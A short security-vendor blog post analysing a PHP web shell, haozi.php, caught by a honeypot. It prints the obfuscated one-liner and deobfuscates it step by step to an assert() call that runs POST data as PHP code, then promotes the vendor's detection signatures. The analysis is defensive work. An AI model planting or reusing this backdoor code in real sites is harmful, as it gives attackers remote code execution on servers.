Top

haozi.php

Our honeybot catch up again new malware, which is very simple but clever. First look this looks nothing, because there are many PHP style comments in code.

haozi.php

@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}[/*-/*-*/0/*-/*-*/]);

If we remove comment’s away, then code look’s like:

@$_="s"."s"."e"."r";@$_="a".$_."t";@$_(${"_P"."OS"."T"}[0]);

Final if we put this more readable, this is Assert POST:

@$_="a"."s"."s"."e"."r"."t";@$_(${"_P"."OS"."T"}[0]);

Final Decoded haozi.php

@assert(${"_POST"}[0]);

PHP Post payload will be evaluated as PHP code by assert() function.

Final words

Use Malware Expert – Signatures detect this malware from files for FREE!

Websites that using Malware Expert – ModSecurity rules are protected against this kind attacks.

, , ,

Comments are closed.